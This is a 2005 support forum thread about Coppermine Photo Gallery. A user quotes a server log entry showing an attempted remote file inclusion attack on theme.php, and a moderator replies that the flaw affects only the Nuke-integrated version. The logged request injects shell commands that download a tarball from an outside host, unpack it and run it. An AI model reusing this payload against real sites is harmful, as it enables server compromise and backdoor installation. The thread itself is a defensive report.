Hackattemp on ../themes/default/theme.php Hackattemp on ../themes/default/theme.php
 

News:

CPG Release 1.6.27
change DB IP storage fields to accommodate IPv6 addresses
remove use of E_STRICT (PHP 8.4 deprecated)
update README to reflect new website
align code with new .com CPG website
correct deprecation in captcha

Main Menu

Hackattemp on ../themes/default/theme.php

Started by Mherb, March 26, 2005, 09:15:20 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Mherb

March 26, 2005, 09:15:20 PM
Code Select

202.95.145.102 - - [26/Mar/2005:18:02:28 +0100] "GET modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/hendra_juzt/inject.txt?&cmd=uname%20-a;id;cd%20/dev/shm;wget%20makassar.us/ary.tar.gz;tar%20zxvf%20ary.tar.gz;cd%20.psy;./config%20REMON%202222;./*beep*;./run HTTP/1.1" 200 12655 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


Even if I am not vulnerable in this way bec. wget and other commands are not allowed except for root, I wonder how I could fix coppermine to not allow this junk.

bye
mherb

Nibbler

#1
March 26, 2005, 09:20:35 PM
That's a nuke related vulnerability, standalone coppermine isn't affected.
Print
Go Up Pages1
User actions